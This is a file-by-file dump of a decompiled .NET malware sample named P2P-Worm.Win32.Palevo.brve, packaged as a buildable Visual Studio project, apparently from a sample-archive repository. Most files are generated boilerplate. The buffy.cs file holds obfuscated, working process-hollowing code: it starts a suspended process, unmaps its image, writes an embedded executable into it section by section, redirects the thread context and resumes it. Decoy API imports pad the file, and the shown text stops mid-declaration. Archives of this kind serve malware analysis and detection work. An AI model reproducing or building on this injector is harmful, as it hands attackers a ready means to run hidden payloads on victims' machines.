auto-decompiled msil via petikvx

add

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyApplication.cs

@@ -0,0 +1,18 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyApplication
+// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
+
+using Microsoft.VisualBasic.ApplicationServices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+
+namespace My
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class MyApplication : ApplicationBase
+  {
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyComputer.cs

@@ -0,0 +1,24 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyComputer
+// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
+
+using Microsoft.VisualBasic.Devices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+
+namespace My
+{
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  internal class MyComputer : Computer
+  {
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [DebuggerHidden]
+    public MyComputer()
+    {
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/MyProject.cs

@@ -0,0 +1,108 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyProject
+// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace My
+{
+  [HideModuleName]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [StandardModule]
+  internal sealed class MyProject
+  {
+    private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
+    private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
+
+    [HelpKeyword("My.Computer")]
+    internal static MyComputer Computer
+    {
+      [DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.Application")]
+    internal static MyApplication Application
+    {
+      [DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.User")]
+    internal static User User
+    {
+      [DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.WebServices")]
+    internal static MyProject.MyWebServices WebServices
+    {
+      [DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
+    internal sealed class MyWebServices
+    {
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      internal new Type GetType() => typeof (MyProject.MyWebServices);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override string ToString() => base.ToString();
+
+      [DebuggerHidden]
+      private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
+
+      [DebuggerHidden]
+      private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public MyWebServices()
+      {
+      }
+    }
+
+    [ComVisible(false)]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    internal sealed class ThreadSafeObjectProvider<T> where T : new()
+    {
+      internal T GetInstance
+      {
+        [DebuggerHidden] get
+        {
+          if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
+            MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
+          return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
+        }
+      }
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public ThreadSafeObjectProvider()
+      {
+      }
+    }
+  }
+}

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.csproj

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{CBDB14DB-5693-4988-AC9E-6C0F682563D1}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>999</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>My</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="pizde.cs" />
+    <Compile Include="buffy.cs" />
+    <Compile Include="MyApplication.cs" />
+    <Compile Include="MyComputer.cs" />
+    <Compile Include="MyProject.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/P2P-Worm.Win32.Palevo.brve.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "999", "P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.csproj", "{CBDB14DB-5693-4988-AC9E-6C0F682563D1}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{CBDB14DB-5693-4988-AC9E-6C0F682563D1}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a/buffy.cs

@@ -0,0 +1,632 @@
+// Decompiled with JetBrains decompiler
+// Type: buffy
+// Assembly: 999, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: DDB616DB-EBCF-4697-A5E1-16ED844B55D4
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-23bffc1f0e8c9480ea4e748fcfdd3162923abcd3fe7eaf6393919e1026d4d47a.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+public class buffy
+{
+  public const long ASDFASFASF = 2778;
+  public const long FASFASFASF = 60116;
+  public const long AFSFASFASCFC = 218;
+  public const long ASDASCASDASD = 218;
+  public const long BVCXBXCBXCB = 218;
+  public const long BXCBXCBXCB = 253;
+  public const long FSDR3FSF = 218;
+  public const long KKKKKKKKKDDDDDDD = 17247;
+  public const uint FSSSSSSSSSSSSSSSSSS = 218;
+
+  public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
+  {
+    object Instance1 = (object) new buffy.Context();
+    object obj1 = (object) new buffy.Process_Information();
+    object obj2 = (object) new buffy.Startup_Information();
+    object obj3 = (object) new buffy.Security_Flags();
+    object obj4 = (object) new buffy.Security_Flags();
+    object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
+    int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
+    Type Type = typeof (Marshal);
+    object[] objArray1 = new object[2];
+    object[] objArray2 = objArray1;
+    object Instance3 = Instance2;
+    object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
+    objArray2[0] = objectValue;
+    objArray1[1] = (object) dosHeader1.GetType();
+    object[] objArray3 = objArray1;
+    object[] Arguments = objArray3;
+    bool[] flagArray = new bool[2]{ true, false };
+    bool[] CopyBack = flagArray;
+    object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
+    if (flagArray[0])
+      NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
+      {
+        RuntimeHelpers.GetObjectValue(objArray3[0])
+      }, (string[]) null, (Type[]) null, true, false);
+    buffy.DOS_Header dosHeader2;
+    buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
+    NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
+    buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
+    buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
+    buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
+    buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
+    buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
+    buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
+    buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
+    buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
+    buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
+    string DASDAS3E2_1 = VVVVVVCAE;
+    object obj6 = obj3;
+    buffy.Security_Flags securityFlags1;
+    buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
+    ref buffy.Security_Flags local1 = ref securityFlags2;
+    object obj7 = obj4;
+    buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
+    ref buffy.Security_Flags local2 = ref securityFlags3;
+    IntPtr num1;
+    IntPtr DSA43R3W1 = num1;
+    object obj8 = obj2;
+    buffy.Startup_Information startupInformation1;
+    buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
+    ref buffy.Startup_Information local3 = ref startupInformation2;
+    object obj9 = obj1;
+    buffy.Process_Information processInformation1;
+    buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
+    ref buffy.Process_Information local4 = ref processInformation2;
+    int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
+    object obj10 = (object) processInformation2;
+    object Instance4 = (object) startupInformation2;
+    object obj11 = (object) securityFlags3;
+    object obj12 = (object) securityFlags2;
+    if (-((uint) num2 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
+    IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
+    object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
+    buffy.NT_Headers ntHeaders2;
+    buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
+    NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
+    {
+      (object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
+    }, (string[]) null, (Type[]) null);
+    NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
+    {
+      (object) 65539
+    }, (string[]) null, (Type[]) null);
+    if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
+      return;
+    buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
+    string DASDAS3E2_2 = VVVVVVCAE;
+    object obj13 = obj12;
+    securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
+    ref buffy.Security_Flags local5 = ref securityFlags2;
+    object obj14 = obj11;
+    securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
+    ref buffy.Security_Flags local6 = ref securityFlags3;
+    IntPtr DSA43R3W2 = num1;
+    object obj15 = Instance4;
+    startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
+    ref buffy.Startup_Information local7 = ref startupInformation2;
+    object obj16 = obj10;
+    processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
+    ref buffy.Process_Information local8 = ref processInformation2;
+    int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
+    object Instance5 = (object) processInformation2;
+    object obj17 = (object) startupInformation2;
+    object obj18 = (object) securityFlags3;
+    object obj19 = (object) securityFlags2;
+    if (-((uint) num3 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
+    object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
+    object obj21 = Instance1;
+    buffy.Context context1;
+    buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
+    ref buffy.Context local9 = ref context2;
+    int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
+    object Instance6 = (object) context2;
+    buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
+    object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
+    int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    long num5;
+    int num6 = checked ((int) num5);
+    ref int local10 = ref num6;
+    int num7 = 0;
+    ref int local11 = ref num7;
+    int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
+    long num9 = (long) num6;
+    buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
+    object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
+    int AL8ZCRFWNU1 = checked ((int) num9);
+    long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
+    buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
+    object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
+    int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
+    int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
+    uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
+    if (num11 == 0U)
+      return;
+    buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
+    object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
+    int AL8ZCRFWNU2 = checked ((int) num11);
+    byte[] DSAE32_1 = DAS4DA3;
+    int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
+    uint num12;
+    int num13 = checked ((int) num12);
+    ref int local12 = ref num13;
+    int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
+    uint num15 = checked ((uint) num13);
+    long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
+    int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
+    int num18 = 0;
+    while (num18 <= num17)
+    {
+      ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
+      buffy.Section_Header sectionHeader1;
+      object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
+      buffy.Section_Header sectionHeader2;
+      sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
+      byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
+      int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
+      int index = 0;
+      while (index <= num19)
+      {
+        numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
+        checked { ++index; }
+      }
+      buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
+      object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+      IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
+      int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
+      byte[] DSAE32_2 = numArray;
+      int da22S3 = checked ((int) sectionHeader1.DA22S3);
+      int num20 = checked ((int) num15);
+      ref int local13 = ref num20;
+      int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
+      num15 = checked ((uint) num20);
+      checked { ++num18; }
+    }
+    object bytes = (object) BitConverter.GetBytes(num11);
+    buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
+    object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
+    int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    byte[] DSAE32_3 = (byte[]) bytes;
+    int num22 = checked ((int) num15);
+    ref int local14 = ref num22;
+    int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
+    num12 = checked ((uint) num22);
+    NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
+    {
+      (object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
+    }, (string[]) null, (Type[]) null);
+    buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
+    object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
+    object obj29 = Instance6;
+    context2 = obj29 != null ? (buffy.Context) obj29 : context1;
+    ref buffy.Context local15 = ref context2;
+    int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
+    object obj30 = (object) context2;
+    buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
+    object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
+    int num25 = (int) ws2XvbnvO9_2(DASEAS);
+  }
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
+
+  [DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RpcNsProfileEltAdd(
+    long ProfileNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
+    ref IntPtr IfId,
+    long MemberNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
+    long Priority,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
+
+  [DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
+
+  [DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
+
+  [DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MgmGetNextMfeStats(
+    ref IntPtr pimmStart,
+    ref long pdwBufferSize,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
+    ref long pdwNumEntries);
+
+  [DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MprAdminDeviceEnum(
+    ref IntPtr hMprServer,
+    long dwLevel,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
+    ref long lpdwTotalEntries);
+
+  [DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MsiDatabaseImport(
+    ref IntPtr hDatabase,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
+
+  [DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetReplExportDirSetInfo(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
+    ref long parm_err);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetUseGetInfo(
+    ref IntPtr UncServerName,
+    ref IntPtr UseName,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsoleInput(
+    long hConsoleInput,
+    ref IntPtr lpBuffer,
+    long nLength,
+    ref long lpNumberOfEventsRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
+
+  [DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SnmpMgrCtl(
+    ref IntPtr session,
+    long dwCtlCode,
+    ref long lpvInBuffer,
+    long cbInBuffer,
+    ref long lpvOUTBuffer,
+    long cbOUTBuffer,
+    ref long lpcbBytesReturned);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long AddAuditAccessAceEx(
+    IntPtr pAcl,
+    long dwAceRevision,
+    long AceFlags,
+    long dwAccessMask,
+    ref IntPtr pSid,
+    long bAuditSuccess,
+    long bAuditFailure);
+
+  [DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLInstallerError(
+    int iError,
+    ref long pfErrorCode,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
+    int cbErrorMsgMax,
+    ref int pcbErrorMsg);
+
+  [DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
+
+  [DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RasSetCredentials(
